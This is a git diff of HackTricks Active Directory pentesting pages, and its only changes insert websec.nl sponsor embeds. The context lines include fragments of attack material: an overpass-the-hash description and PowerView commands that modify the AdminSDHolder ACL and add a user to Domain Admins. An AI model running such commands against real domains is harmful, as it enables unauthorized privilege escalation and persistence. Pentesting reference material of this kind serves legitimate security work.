index 13cf4211e..d2e6d1775 100644
--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -14,6 +14,10 @@ Other ways to support HackTricks:
+
+ +{% embed url="https://websec.nl/" %} + **This is a summary of escalation technique sections of the posts:** * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf)
@@ -620,6 +624,10 @@ Upon authentication across a trust, the **Authenticated Users SID** is added to Both scenarios lead to an **increase in the attack surface** from one forest to another. The settings of the certificate template could be exploited by an attacker to obtain additional privileges in a foreign domain. +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
index 8374c1138..1b6d96219 100644
--- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
+++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md
@@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Introduction The Kerberos "Double Hop" problem appears when an attacker attempts to use **Kerberos authentication across two** **hops**, for example using **PowerShell**/**WinRM**.
@@ -110,6 +115,10 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T * [https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting](https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting) * [https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/](https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md
index e8eed6922..e1c532be6 100644
--- a/windows-hardening/active-directory-methodology/laps.md
+++ b/windows-hardening/active-directory-methodology/laps.md
@@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information Local Administrator Password Solution (LAPS) is a tool used for managing a system where **administrator passwords**, which are **unique, randomized, and frequently changed**, are applied to domain-joined computers. These passwords are stored securely within Active Directory and are only accessible to users who have been granted permission through Access Control Lists (ACLs). The security of the password transmissions from the client to the server is ensured by the use of **Kerberos version 5** and **Advanced Encryption Standard (AES)**.
@@ -134,6 +139,10 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T ## References * [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
index 519472ee5..76e88832c 100644
--- a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
+++ b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md
@@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Overpass The Hash/Pass The Key (PTK) The **Overpass The Hash/Pass The Key (PTK)** attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network.
@@ -49,6 +54,10 @@ To conform to operational security and use AES256, the following command can be * [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md
index 572221a65..9d3304f0d 100644
--- a/windows-hardening/basic-powershell-for-pentesters/powerview.md
+++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md
@@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) [**SharpView**](https://github.com/tevora-threat/SharpView) is a .NET port of [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
@@ -342,6 +347,11 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local ``` + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!